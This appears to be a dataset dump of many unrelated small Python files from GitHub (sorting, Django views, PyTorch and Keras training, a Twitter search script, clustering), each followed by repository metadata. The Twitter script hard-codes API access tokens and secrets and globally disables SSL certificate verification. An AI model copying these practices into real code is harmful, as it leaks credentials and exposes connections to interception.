if argcount > 1:
console_input(argcommand)
while(1):
usercommand = input("- ")
log.append(usercommand)
usercommand = list(usercommand.split(" ")) # Take the string list as a whole and split it into string sub-lists (= 2D array) for each words
console_input(usercommand[0]) # Take the first word as parameter (= command)
"""
| Pitchumi/PongPython | TKinter/devconsole.py | devconsole.py | py | 4,294 | python | en | code | 0 | github-code | 13 |
70337602579 | #!/usr/bin/env python
"""
Minimal example for running an async web server using aiohttp.
Code taken from here:
http://aiohttp.readthedocs.io/en/stable/web.html
"""
from aiohttp import web
async def hello(request):
    """Handle GET / with a static plain-text body."""
    return web.Response(body=b"Hello, world")
app = web.Application()
app.router.add_route('GET', '/', hello)
# Blocks here, serving on aiohttp's default host/port until interrupted.
web.run_app(app)
| deeplook/backend-code-challenge | serve_aiohttp.py | serve_aiohttp.py | py | 347 | python | en | code | 0 | github-code | 13 |
22335271885 | #Solution1 - for fractional numbers only
class Sort:
    """Bucket sort for fractional values in [0, 1), using insertion sort
    inside each bucket."""

    # BUG FIX: the first parameter was named `Self` (capital S), which is
    # non-standard and confusing; renamed to the conventional `self`.
    def insertionSort(self, arr):
        """In-place insertion sort; returns the same list for convenience."""
        for i in range(1, len(arr)):
            key = arr[i]
            j = i - 1
            # Shift larger elements right until key's slot is found.
            while j >= 0 and key < arr[j]:
                arr[j + 1] = arr[j]
                j -= 1
            arr[j + 1] = key
        return arr

    def bucketSort(self, arr):
        """Sort fractional values in [0, 1) in place and return the list.

        Each value v lands in bucket int(len(arr) * v), so inputs must be
        strictly below 1.0.
        """
        buckets = []
        for num in range(len(arr)):
            buckets.append([])
        for i in arr:
            bucket_index = int(len(arr) * i)
            buckets[bucket_index].append(i)
        for j in range(len(arr)):
            buckets[j] = self.insertionSort(buckets[j])
        k = 0
        for i in range(len(arr)):
            for j in range(len(buckets[i])):
                arr[k] = buckets[i][j]
                k += 1
        return arr
# Demo: sort a list of fractions in [0, 1) with bucket sort (solution 1).
obj = Sort()
arr1 = [0.897, 0.565, 0.656, 0.1234, 0.665, 0.3434]
sortedArray = obj.bucketSort(arr1)
print(sortedArray)
#Solution2 - for fractional or integers
class Sort:
    """Bucket sort that also handles values outside [0, 1)."""

    def insertionSort(self, arr):
        """Sort arr in place by insertion; return it."""
        for pos in range(1, len(arr)):
            current = arr[pos]
            slot = pos - 1
            while slot >= 0 and current < arr[slot]:
                arr[slot + 1] = arr[slot]
                slot -= 1
            arr[slot + 1] = current
        return arr

    def bucketSort(self, arr):
        """Distribute values into len(arr) buckets, sort each, concatenate."""
        n = len(arr)
        width = max(arr) / n  # value span covered by one bucket
        buckets = [[] for _ in range(n)]
        for value in arr:
            index = int(value / width)
            # The maximum value would index one past the end; send it to
            # the last bucket instead.
            buckets[index if index != n else n - 1].append(value)
        for bucket in buckets:
            self.insertionSort(bucket)
        write = 0
        for bucket in buckets:
            for value in bucket:
                arr[write] = value
                write += 1
        return arr
# Demo: sort integers with the general-purpose Sort (solution 2);
# note this exercises insertionSort directly, not bucketSort.
obj = Sort()
arr2 = [12,11,13,5,6]
sortedArray = obj.insertionSort(arr2)
print(sortedArray)
| komalupatil/Leetcode_Solutions | Sorting Algorithms/Bucket Sort.py | Bucket Sort.py | py | 1,987 | python | en | code | 1 | github-code | 13 |
21472626439 | import numpy as np
import tensorflow as tf
from pathlib import Path
from django.views.generic import TemplateView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render
from .forms import CommentTextForm
from .utils import clear_text
from .models import Results, UserStudiesCount
# Create your views here.
class ClassificationView(LoginRequiredMixin, TemplateView):
    """Toxicity-classification page.

    GET renders the comment form plus the user's running study count.
    POST runs the saved Keras model on the cleaned text, persists the six
    predicted labels, and re-renders the page with the results.
    """
    template_name = "classifier/classification.html"

    def get(self, request):
        """Render the form together with the user's study counter."""
        try:
            user_studies_count = UserStudiesCount.objects.get(user=request.user)
        except UserStudiesCount.DoesNotExist:
            # BUG FIX: was a bare `except:` that silently swallowed every
            # error; only the missing-row case should default to zero.
            studies_count = 0
        else:
            studies_count = user_studies_count.count
        context = {
            "form": CommentTextForm(),
            "studies_count": studies_count,
        }
        return render(request, self.template_name, context)

    def post(self, request):
        """Validate the form, predict the six toxicity labels, persist them."""
        form = CommentTextForm(request.POST)
        if form.is_valid():
            input_text = form.cleaned_data.get("comment_text")
            clean_text = clear_text(input_text)
            # NOTE(review): the model is re-loaded from disk on every request;
            # consider loading it once at module import time.
            model = tf.keras.models.load_model(
                Path(Path(__file__).parent, "end_to_end_48")
            )
            predict = model.predict(np.expand_dims(clean_text, 0))
            predict = (predict > 0.5).astype(int)  # threshold each label at 0.5
            results = Results(
                comment_text=input_text,
                toxic=predict[0][0],
                severe_toxic=predict[0][1],
                obscene=predict[0][2],
                threat=predict[0][3],
                insult=predict[0][4],
                identity_hate=predict[0][5],
            )
            results.save()
            user_studies_count = UserStudiesCount.objects.get(user=request.user)
            user_studies_count.count += 1
            user_studies_count.save()
            context = {
                "form": form,
                "results": {
                    "toxic": predict[0][0],
                    "severe_toxic": predict[0][1],
                    "obscene": predict[0][2],
                    "threat": predict[0][3],
                    "insult": predict[0][4],
                    "identity_hate": predict[0][5],
                },
            }
            return render(request, self.template_name, context)
        # BUG FIX: an invalid form previously fell off the end of the method
        # and returned None, which makes Django raise. Re-render with the
        # bound form so field errors are shown.
        return render(request, self.template_name, {"form": form})
| pavlovich-ivan/text-toxicity-analyzer | app/classifier/views.py | views.py | py | 2,315 | python | en | code | 0 | github-code | 13 |
2105030042 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: ran
@file: triangle_120.py
@time: 2021/6/20 16:25
@desc:
三角形最小路径和
给定一个三角形 triangle ,找出自顶向下的最小路径和。
每一步只能移动到下一行中相邻的结点上。相邻的结点 在这里指的是 下标 与 上一层
结点下标 相同或者等于 上一层结点下标 + 1 的两个结点。也就是说,如果正位于当前行
的下标 i ,那么下一步可以移动到下一行的下标 i 或 i + 1 。
动态规划解题 思路:
1.定义状态
DP[i, j] 为从最下面节点到[i, j]节点走的路径和的最小值
2.DP方程:列出状态转移方程
DP[i, j] = min(DP[i+1, j], DP[i+1, j+1]) + triangle[i, j]
核心思想:反向进行递推
"""
class Solution(object):
def minimumTotal(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
if not triangle:
return 0
res = triangle[-1]
for i in range(len(triangle) - 2, -1, -1):
for j in range(len(triangle[i])):
res[j] = triangle[i][j] + min(res[j], res[j + 1])
return res[0]
| reflectc/leetcode_program | src/triangle_120.py | triangle_120.py | py | 1,296 | python | zh | code | 0 | github-code | 13 |
1310102853 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class MultivariateLinearRegressionModel(nn.Module):
    """Linear model mapping 3 input features to a single prediction."""
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(3, 1)  # weight (1, 3) + bias (1,)
    def forward(self, x):
        # x: (batch, 3) -> (batch, 1)
        return self.linear(x)
def train(model, optimizer, x_train, y_train):
    """Run 20 full-batch gradient steps minimising MSE, logging each epoch."""
    nb_epochs = 20
    for epoch in range(nb_epochs):
        cost = F.mse_loss(model(x_train), y_train)
        optimizer.zero_grad()   # clear gradients accumulated last step
        cost.backward()         # backpropagate the loss
        optimizer.step()        # update parameters
        print(f'Epoch {epoch:4d}/{nb_epochs} Cost: {cost.item():.6f}')
torch.manual_seed(1)
# Toy dataset: three exam scores per student, one target score.
x_train = torch.FloatTensor([[73, 80, 75],
                             [93, 88, 93],
                             [89, 91, 90],
                             [96, 98, 100],
                             [73, 66, 70]])
y_train = torch.FloatTensor([[152], [185], [180], [196], [142]])
# Standardise each feature column to zero mean / unit variance.
norm_x_train = (x_train - x_train.mean(dim=0))/x_train.std(dim=0)
print(norm_x_train)
print(x_train)
model = MultivariateLinearRegressionModel()
#optimizer = optim.SGD(model.parameters(), lr=0.0000001)
#train(model, optimizer, x_train, y_train)
#print('------')
model = MultivariateLinearRegressionModel()
optimizer = optim.SGD(model.parameters(), lr=0.1) # normalised inputs tend to converge faster
train(model, optimizer, norm_x_train, y_train)
38362611888 | class Solution1(object):
"""
Sorting
- Time: O(N log N)
- Space: O(N)
"""
def kClosest(self, points, K):
"""
:type points: List[List[int]]
:type K: int
:rtype: List[List[int]]
"""
dist = [(i,x[0]*x[0]+x[1]*x[1]) for i,x in enumerate(points)]
dist.sort(key=lambda x:x[1])
return [points[i] for i,_ in dist[:K]]
class Solution2(object):
    """
    QuickSort (quickselect-style partition)
    - Time: O(N) on average (worst case is quadratic for adversarial pivots)
    - Space: O(N)
    """
    def kClosest(self, points, K):
        """
        :type points: List[List[int]]
        :type K: int
        :rtype: List[List[int]]
        """
        self.topK = []
        self.findTopK(points, K)
        return self.topK
    def findTopK(self, points, K):
        # Partition around points[0] by squared distance to the origin,
        # then recurse only into the side that still contains the K-th point.
        # choose pivot: just select the 1st element // TO-DO: improve by order of statics
        pivot_idx, i = 0, 1
        pivot_dist = points[pivot_idx][0]*points[pivot_idx][0]+points[pivot_idx][1]*points[pivot_idx][1]
        while i<len(points):
            if points[i][0]*points[i][0]+points[i][1]*points[i][1] < pivot_dist:
                # swap(i,pivot) to move points[i] to smaller part
                tmp = points[i]
                points[i] = points[pivot_idx]
                points[pivot_idx] = tmp
                # swap(i,pivot+1) to remain order [<pivot|pivot|>pivot]
                tmp = points[pivot_idx+1]
                points[pivot_idx+1] = points[i]
                points[i] = tmp
                pivot_idx += 1
            i += 1
        # pivot now sits at pivot_idx; everything before it is strictly closer.
        if pivot_idx<K:
            # All of [0..pivot_idx] belong to the answer; find the rest on the right.
            self.topK += points[:pivot_idx+1]
            if K-pivot_idx-1>0: self.findTopK(points[pivot_idx+1:], K-pivot_idx-1)
        else: self.findTopK(points[:pivot_idx+1], K)
| rctzeng/AlgorithmDataStructuresPractice | Leetcode/KClosestPointsToOrigin_973.py | KClosestPointsToOrigin_973.py | py | 1,727 | python | en | code | 0 | github-code | 13 |
22335021715 | #Leetcode 17. Letter Combinations of a Phone Number
class Solution:
    """LeetCode 17: map a digit string (digits 2-9) to all letter combinations."""

    def letterCombinations(self, digits: str) -> List[str]:
        """Return every letter string spelled by *digits*, in DFS order."""
        mapping = {"2": "abc", "3": "def", "4": "ghi", "5": "jkl",
                   "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz"}
        if not digits:
            return []
        if len(digits) == 1:
            return list(mapping[digits[0]])
        result = []
        self.dfs(digits, 0, "", mapping, result)
        return result

    def dfs(self, digits, index, path, mapping, result):
        """Depth-first expansion: *path* spells digits[:index] so far."""
        if index == len(digits):
            result.append(path)
        else:
            for letter in mapping[digits[index]]:
                self.dfs(digits, index + 1, path + letter, mapping, result)
16732682352 | import sounddevice as sd
import numpy as np
import os
import sys
import math
import time
import datetime
import argparse
import csv
from timeit import default_timer as timer
# CLI definition for the "yell detector".
parser = argparse.ArgumentParser(description="Beeps at you when you\'re too loud",
                formatter_class=argparse.RawTextHelpFormatter)
# needs to be renamed and able to set to a choice of low/med/high or something similar
# e.g. -s (sensitivity), -l (level)
parser.add_argument("-t", "--threshold", help="normalized volume value that triggers a 'yell'",
                    type=int, default=180)
parser.add_argument("-d", "--duration", type=int, default=1,
                    help="time (in seconds) in between 'yells' (default 1 second)")
parser.add_argument("-v", "--verbosity", type=int, default=0, choices=[0,1,2],
                    help="""how verbose the program is:
0 = no printed output
1 = outputs audio bars
2 = outputs normalized volume values""")
parser.add_argument("-nr", "--NoRecord", help="disables recording data into a .csv file", action="store_true")
args = parser.parse_args()
# normalized volume value that triggers a 'yell' (Default 180)
threshold = args.threshold
# Duration in seconds between 'yells' (Default 1 second)
duration = args.duration
# Determines the verbosity of the printed output
# 0 = no output, 1 = bars, 2 = exact values
verbosity = args.verbosity
# In Powershell, this creates the windows noise
cmd = "echo " + chr(7)
# Open the data.csv file in append mode
f = open('./yell_records.csv', 'a', newline='')
field_names = ['Threshold', 'Volume Value', 'Datetime']
writer = csv.writer(f)
# Write headers if file is empty
if os.stat('yell_records.csv').st_size == 0:
    writer.writerow(field_names)
# Per-session state used by the audio callback and the shutdown handler.
yell_counter = 0
start_time = timer()
start_datetime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# Save for later!!! -- grabs and formats current datetime. Used for storing time of yell in .csv
# current_datetime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def print_sound(indata, outdata, frames, time, status):
    """sounddevice stream callback: log volume and record a 'yell' when loud.

    NOTE: the `time` parameter (part of the sounddevice callback signature)
    shadows the `time` module inside this function; it is unused here.
    """
    global yell_counter
    # Rough loudness measure: scaled L2 norm of the input block.
    volume_norm = np.linalg.norm(indata)*10
    if (verbosity == 1):
        print ("|" * int(volume_norm))
    elif (verbosity == 2):
        print(int(volume_norm))
    if (volume_norm >= threshold): # 180 seems like a good start
        # Beep (terminal bell via shell), log the yell, then back off so one
        # shout is not counted many times.
        os.system(cmd)
        current_datetime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        data = [threshold, math.trunc(volume_norm), current_datetime]
        writer.writerow(data)
        yell_counter += 1
        sd.sleep(duration * 1000)
try:
    # Run the audio stream until the user interrupts with Ctrl+C.
    with sd.Stream(blocksize=0, callback=print_sound):
        # sd.sleep(duration * 1000)
        print('press Ctrl+C to stop the recording')
        while True:
            time.sleep(60)
except KeyboardInterrupt:
    # Graceful shutdown: close the per-yell log and append a session summary.
    f.close()
    seconds = math.trunc(timer() - start_time)
    # formats elapsed time in seconds to datetime format, accounting for rollover (>24h)
    elapsed_time = str(datetime.timedelta(seconds=seconds))
    field_names = ['Datetime started', 'Elapsed Time', 'Number of Yells', 'Threshold']
    data = [start_datetime, elapsed_time, yell_counter, threshold]
    with open('session_records.csv', 'a', newline='') as f:
        writer = csv.writer(f)
        # Write headers if file is empty
        if os.stat('session_records.csv').st_size == 0:
            writer.writerow(field_names)
        writer.writerow(data)
    if (args.NoRecord):
        sys.exit('Interrupted by user. Program ran for {}'.format(elapsed_time))
    sys.exit('Interrupted by user; you yelled {} times within a time interval of {}!'.format(yell_counter, elapsed_time))
71545554259 | import tensorflow as tf
import numpy as np
import matplotlib
from matplotlib import pyplot as plt
# MNIST setup: 10 digit classes, 28x28 single-channel images.
num_classes = 10
img_rows, img_cols, img_ch = 28, 28, 1
input_shape = (img_rows, img_cols, img_ch)
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
# Scale pixels to [0, 1] and add the trailing channel dimension.
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = x_train.reshape(x_train.shape[0], *input_shape)
x_test = x_test.reshape(x_test.shape[0], *input_shape)
print('Training data: {}'.format(x_train.shape))
print('Testing data: {}'.format(x_test.shape))
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPooling2D
def lenet(name='lenet'):
    """Build a LeNet-5 style CNN for `input_shape` inputs and `num_classes` outputs."""
    layers = [
        # Feature extractor: two conv + max-pool stages.
        Conv2D(6, kernel_size=(5, 5), padding='same', activation='relu', input_shape=input_shape),
        MaxPooling2D(pool_size=(2, 2)),
        Conv2D(16, kernel_size=(5, 5), activation='relu'),
        MaxPooling2D(pool_size=(2, 2)),
        # Classifier head.
        Flatten(),
        Dense(120, activation='relu'),
        Dense(84, activation='relu'),
        Dense(num_classes, activation='softmax'),
    ]
    model = Sequential(layers, name=name)
    return model
from tensorflow.keras.optimizers import SGD, Adagrad, Adadelta, RMSprop, Adam, Adamax, Nadam
# Setting some variables to format the logs:
log_begin_red, log_begin_blue, log_begin_green = '\033[91m', '\n\033[94m', '\033[92m'
log_begin_bold, log_begin_underline = '\033[1m', '\033[4m'
log_end_format = '\033[0m'
# One optimizer instance per experiment; each gets its own fresh model below.
optimizers_examples = {
    'sgd': SGD(),
    'momentum': SGD(momentum=0.9),
    'nag': SGD(momentum=0.9, nesterov=True),
    'adagrad': Adagrad(),
    'adadelta': Adadelta(),
    'rmsprop': RMSprop(),
    'adam': Adam(),
    'adamax': Adamax(),
    'nadam': Nadam()
}
history_per_optimizer = dict()
print("Experiment: {0}start{1} (training logs = off)".format(log_begin_red, log_end_format))
for optimizer_name in optimizers_examples:
    # Resetting the seeds (for random number generation), to reduce the impact of randomness on the comparison:
    tf.random.set_seed(42)
    np.random.seed(42)
    # Creating the model:
    model = lenet("lenet_{}".format(optimizer_name))
    optimizer = optimizers_examples[optimizer_name]
    model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['accuracy'])
    # Launching the training (we set `verbose=0`, so the training won't generate any logs):
    # NOTE(review): despite the comment above, verbose=1 here, so per-batch
    # training logs ARE printed.
    print("\t> Training with {0}: {1}start{2}".format(
        optimizer_name, log_begin_red, log_end_format))
    history = model.fit(x_train, y_train,
                        batch_size=32, epochs=10, validation_data=(x_test, y_test),
                        verbose=1)
    history_per_optimizer[optimizer_name] = history
    print('\t> Training with {0}: {1}done{2}.'.format(
        optimizer_name, log_begin_green, log_end_format))
print("Experiment: {0}done{1}".format(log_begin_green, log_end_format))
# Plot loss/accuracy (train and validation) for every optimizer on one figure.
fig, ax = plt.subplots(2, 2, figsize=(10,10), sharex='col')
ax[0, 0].set_title("loss")
ax[0, 1].set_title("val-loss")
ax[1, 0].set_title("accuracy")
ax[1, 1].set_title("val-accuracy")
lines, labels = [], []
for optimizer_name in history_per_optimizer:
    history = history_per_optimizer[optimizer_name]
    ax[0, 0].plot(history.history['loss'])
    ax[0, 1].plot(history.history['val_loss'])
    ax[1, 0].plot(history.history['accuracy'])
    line = ax[1, 1].plot(history.history['val_accuracy'])
    lines.append(line[0])
    labels.append(optimizer_name)
fig.legend(lines,labels, loc='center right', borderaxespad=0.1)
plt.subplots_adjust(right=0.85)
plt.show()
8151426436 | import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import toascii
max_len = 250
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Net(nn.Module):
    """Stacked bidirectional LSTM classifier over packed token sequences.

    Emits one logit per output position (max_len of them) from the last
    time step of the second LSTM stack.
    """
    def __init__(self, device, batch_size, input_size=max_len, hidden_size=max_len, num_layers=3):
        super(Net, self).__init__()
        self.device = device
        self.hidden_size = hidden_size
        self.batch_size = batch_size
        self.num_layers = num_layers
        # +1 reserves index 0 as the padding token.
        self.vocab_size = 55193 + 1
        self.embedding = nn.Embedding(
            num_embeddings=self.vocab_size,
            embedding_dim=input_size,
            padding_idx=0
        )
        # Both LSTMs are bidirectional, hence the *2 on the second input size.
        self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True, bidirectional=True)
        self.lstm2 = nn.LSTM(hidden_size*2, hidden_size, num_layers, batch_first=True, bidirectional=True)
        self.dropout = nn.Dropout(0.5)
        self.fc = nn.Linear(input_size * 2, max_len)
    def forward(self, x, seq_len):
        # x: (batch, time) token ids; seq_len: per-sample lengths for packing.
        embed = self.embedding(x)
        packed_embed = pack_padded_sequence(embed, seq_len, batch_first=True)
        # Initialize hidden state, cell state with zeros
        h0 = torch.zeros(self.num_layers * 2, x.size()[0], self.hidden_size).requires_grad_().to(self.device)
        c0 = torch.zeros(self.num_layers * 2, x.size()[0], self.hidden_size).requires_grad_().to(self.device)
        out, (final_hidden_state, final_cell_state) = self.lstm(packed_embed, (h0, c0))
        out, (final_hidden_state, final_cell_state) = self.lstm2(out)
        output_unpacked, output_lengths = pad_packed_sequence(out, batch_first=True)
        # Take the last time step, apply dropout, then project to max_len logits.
        # NOTE(review): with packing, [-1] is the last *padded* step, which for
        # shorter sequences may be padding — confirm intended.
        h_t = output_unpacked[:, -1, :]
        out = self.dropout(h_t)
        out = self.fc(out)
        return out
# Restore the trained weights and switch to inference mode (disables dropout).
model = Net(DEVICE, 1).cuda()
model.load_state_dict(torch.load('checkpoint.pt'))
model.eval()
sigmoid = torch.sigmoid
def predict(model, x, len_seq):
    """Run the trained model on one encoded sequence of length *len_seq*."""
    lengths = [torch.tensor(len_seq).int()]
    return model(x, lengths)
with torch.no_grad():
    # Demo: predict per-character "no space after" labels for one sentence,
    # then reinsert spaces wherever the label is off.
    text = "술마시다 물마시다 커피 마시다처럼 쓰는 것이 의미상 좀 더 적확하다고 볼 수는 있겠으나 그렇다고 하여 먹다를 쓸 수 없는 것은 아닙니다 한국어의 먹다는 액체뿐만 아니라 기체에도 사용됨을 참고하시기 바랍니다"
    pred = predict(model, toascii.asci(text, max_len), len(text))
    pred = sigmoid(pred).round()  # binarise logits at 0.5
    text = [i for i in text]
    result = []
    for index, label in enumerate(pred):
        # a[i] is True where the model says "attach the next char without a space".
        a = torch.eq(label, torch.ones(max_len).to(DEVICE)).detach().cpu()
        for i, tex in enumerate(text):
            if a[i]:
                result.append(tex)
            else:
                result.append(tex + ' ')
    print("".join(result))
| HaloKim/kor-sentence | predict.py | predict.py | py | 2,830 | python | en | code | 0 | github-code | 13 |
70221744018 | from django.shortcuts import render, redirect
from django.http import HttpResponse
from qtech_search_engine.models import KeywordDescriptionModel, AllUsers
# Create your views here.
def HomeView(request):
    """Render the home page with every known keyword."""
    context = {'keywords': KeywordDescriptionModel.objects.all()}
    return render(request, "qtech_search_engine/home.html", context)
def SearchView(request):
    """Search page: track the visitor via a 'device' cookie and record searches.

    NOTE(review): control flow relies on two bare `except:` clauses — a missing
    cookie or a missing keyword silently falls through to the plain search page.
    Narrowing these to KeyError / DoesNotExist would avoid masking real bugs.
    """
    try:
        print("Trying")
        print(request.COOKIES['device'])
        # One AllUsers row per device cookie; name new visitors "User N".
        customer, created = AllUsers.objects.get_or_create(user_sid = request.COOKIES['device'])
        if created is True:
            print("creating")
            counter = AllUsers.objects.all().count()
            customer.username = "User " + str(counter)
            customer.save()
        if "keyword_submit_button" in request.POST:
            print("Searching: ", request.POST['keyword_query'])
            try:
                # Bump the keyword's search counter and link it to this user.
                keyword_instance = KeywordDescriptionModel.objects.get(keyword=request.POST['keyword_query'])
                keyword_searched_counter = keyword_instance.times_searched + 1
                print(keyword_searched_counter)
                keyword_instance.times_searched = keyword_searched_counter
                keyword_instance.save()
                print("Updated counter")
                keyword_instance.user.add(customer)
                keywords = KeywordDescriptionModel.objects.all()
                searches = KeywordDescriptionModel.objects.filter(keyword=request.POST['keyword_query'])
                context = {
                    'keywords': keywords,
                    'searches': searches
                }
                return render(request, "qtech_search_engine/results.html", context)
            except:
                # Unknown keyword (or any other error): fall through to the search page.
                print("")
    except:
        print("No cookie found")
    # Default: render the empty search form.
    context = {
    }
    return render(request, "qtech_search_engine/search.html", context)
def TestView(request):
    """Render the test page with every known keyword."""
    context = {'keywords': KeywordDescriptionModel.objects.all()}
    return render(request, "qtech_search_engine/test.html", context)
2369303713 | from twitter import Twitter, OAuth
import random
import os, ssl
#catches verification errors
# NOTE(security): this disables TLS certificate verification for all HTTPS
# connections in the process — acceptable only for throwaway scripts.
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and
    getattr(ssl, '_create_unverified_context', None)):
    ssl._create_default_https_context = ssl._create_unverified_context
def butt(hashtags):
    """Search Twitter for #<hashtags> and return one random matching tweet text.

    NOTE(security): API credentials are hard-coded below and committed to the
    repo; they should be revoked and moved to environment variables.
    """
    ACCESS_TOKEN = "1094105071346954240-cq8p86mVwoNW5D4hVgCpgetlNXhhEq"
    ACCESS_SECRET = "yF8wWyLqEX16RvmHqWxQnh1jBN619lRKlrn6LK42FxZM9"
    CONSUMER_KEY = "PW3luCZ75v2Pi7d11w7z9yIbm"
    CONSUMER_SECRET = "tueL9DcKQUZjAhntoXZDQXhcmqnR2KyrTchLttprZIolVIt8ZP"
    oauth = OAuth(ACCESS_TOKEN, ACCESS_SECRET, CONSUMER_KEY, CONSUMER_SECRET)
    t = Twitter(auth=oauth)
    query = t.search.tweets(q='%23' + hashtags)
    detects = []
    for s in query['statuses']:
        print(s['text'], '\n')
        detects.append(s['text'])
    # NOTE(review): random.choice raises ValueError when the search returns
    # no statuses.
    randCapt = random.choice(detects)
    randCapt = "#" + randCapt
    return randCapt
# NOTE(review): butt() is called twice here, i.e. two separate API searches.
butt('lmfao')
print(butt('lmfao'))
74403148817 | import sys
from sets import Set
def get_problem(infile):
    """Parse one test case: (existing directories, directories to create).

    NOTE: Python 2 code — uses file.next(); under Python 3 this would be
    next(infile).
    """
    NM = [int(val) for val in infile.next().strip().split(' ')]
    N = NM[0]
    M = NM[1]
    exist_dir = None
    new_dir = None
    exist_dir = [infile.next().strip() for i in range(N)]
    new_dir = [infile.next().strip() for j in range(M)]
    return (exist_dir, new_dir)
def insert_dir_to_set(S, new_dir):
    """Add every ancestor path of *new_dir* (and the path itself) to set *S*."""
    for prefix in expand_dir(new_dir.split('/')):
        S.add(prefix)
def expand_dir(tokens):
    """Yield each cumulative '/'-joined prefix of *tokens*.

    The first element (the empty string before a leading '/') is popped from
    the caller's list, matching the original contract.
    """
    tokens.pop(0)
    path = ''
    for part in tokens:
        path = path + '/' + part
        yield path
def solve_problem(case):
    """Count how many mkdir calls are needed (Code Jam "File Fix-it").

    *case* is (existing directories, directories to create); every missing
    ancestor of a new directory costs one mkdir.
    """
    exist_dir = case[0]
    new_dir = case[1]
    # Python 2 sets module; under Python 3 this would be the built-in set().
    dir_set = Set()
    for d in exist_dir:
        insert_dir_to_set(dir_set, d)
    count = 0
    for d in new_dir:
        expanded = expand_dir(d.split('/'))
        for d in expanded:
            if d not in dir_set:
                dir_set.add(d)
                count = count+1
    return count
def main():
    """Entry point: read all T cases from argv[1], write 'Case #i: n'
    answers to argv[2] (Google Code Jam output format).

    NOTE(review): neither file handle is closed; on CPython they are
    released at interpreter exit, but a with-statement would be safer.
    """
    infile = open(sys.argv[1], 'r')
    outfile = open(sys.argv[2],'w')
    T = int(infile.next())
    problems = [get_problem(infile) for i in range(T)]
    result = [solve_problem(case) for case in problems]
    for i in range(len(result)):
        outfile.write("Case #{0}: {1}\n".format(i+1, result[i]))
| litao91/googlecodejam | filefixit/filefixit.py | filefixit.py | py | 1,375 | python | en | code | 1 | github-code | 13 |
36933256183 | '''
Welcome to GDB Online.
GDB online is an online compiler and debugger tool for C, C++, Python, Java, PHP, Ruby, Perl,
C#, VB, Swift, Pascal, Fortran, Haskell, Objective-C, Assembly, HTML, CSS, JS, SQLite, Prolog.
Code, Compile, Run and Debug online from anywhere in world.
'''
# Read n elements, then print n rows: row i is the input list rotated
# right by i positions (index (j - i) mod n at column j).
n=int(input("Enter the number of elements: "))
lst=[]
for i in range(n):
    lst.append(input("Enter the element: "))
print(lst)
for i in range(n):
    for j in range(n):
        if(i<=j):
            print(lst[j-i],end=" ")
        else:
            # wrap around: (j - i) mod n == n - (i - j)
            a=n-(i-j)
            print(lst[a],end=" ")
    # print("\n") emits the newline plus print's own newline, i.e. a
    # blank line between pattern rows.
    print("\n")
29201566825 | import numpy as np
import datetime
# Single-linkage clustering (Kruskal-style union of closest pairs) on
# the Coursera 'clustering1.txt' edge list; stops at k clusters and
# reports the max spacing (weight of the first rejected merge edge).
print('start loading data:', datetime.datetime.now())
# NOTE(review): 'file' shadows the Python 2 builtin of the same name.
file = "clustering1.txt"
# NOTE(review): this second message repeats 'start loading data'; it
# looks like a copy-paste leftover.
print('start loading data:', datetime.datetime.now())
with open('F:\\Google Drive\\coursera\\Algorithms - Tim Roughgarden\\3. Greedy Algorithms, Minimum Spanning Trees, and Dynamic Programming\\' + file) as f:
    lines=f.read().split('\n')
i = -1
for l in range(len(lines)):
    if lines[l]:
        tmp = lines[l].split()
        tmp = [int(t) for t in tmp]
        if i==-1:
            # First line holds the vertex count; allocate room for all
            # n_v*(n_v-1)/2 possible edges (rows: [u, v, distance]).
            n_v = tmp[0]
            i += 1
            G = np.zeros(shape = (n_v*(n_v-1)//2,3))
        else:
            G[i,:] = tmp
            i+=1
print(G, G.shape)
print('finish loading data, start calculating:', datetime.datetime.now())
k=4
n_cluster = n_v # initially each vertice is a cluster
cluster = np.column_stack((range(1,n_v+1), range(1,n_v+1)))
# ndarray: first column is vertice number, second column is cluster number
G = G[np.argsort(G[:,2])] # sort edges by distances
for i in range(len(G)):
    # Look up the cluster label of each endpoint (linear scan per edge).
    v1, c1 = tuple(cluster[cluster[:,0]==G[i,0],:][0])
    v2, c2 = tuple(cluster[cluster[:,0]==G[i,1],:][0])
    if c1 != c2: # if two vertices belong to different cluster
        if n_cluster==k:
            # First inter-cluster edge once k clusters remain = spacing.
            max_spacing = G[i,2]
            break
        cluster[cluster[:,1]==c1, 1] = c2
        n_cluster -= 1
#print(G)
print('max_spacing=', max_spacing)
for gr in set(cluster[:,1]):
    print('group ', gr, 'has ', cluster[cluster[:,1]==gr].shape[0], 'vertices')
| sunanqi/learning | Greedy Algorithms- Minimum Spanning Trees- and Dynamic Programming by Tim Roughgarden/clustering.py | clustering.py | py | 1,479 | python | en | code | 0 | github-code | 13 |
32903262375 | import tkinter as tk
from tkinter import ttk, filedialog, simpledialog
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import pandas as pd
import libSimpleNnet
class Application(tk.Frame):
    """
    GUI class, inherits from Tkinter's Frame class.

    Wraps libSimpleNnet: loads CSV training data, trains a model with a
    progress bar and live loss plot, and saves/loads/runs the model.
    """
    def __init__(self, master=None):
        super().__init__(master)
        self.master = master
        self.pack()
        self.create_widgets()
        # Matplotlib figure embedded in the Tk window for the loss curve.
        self.figure = Figure(figsize=(5, 5), dpi=100)
        self.loss_plot = self.figure.add_subplot(111)
        self.loss_plot.set_xlabel("Epoch")
        self.loss_plot.set_ylabel("Loss")
        self.canvas = FigureCanvasTkAgg(self.figure, self)
        self.canvas.get_tk_widget().pack()
    def create_widgets(self):
        """
        Initialize the GUI widgets.
        """
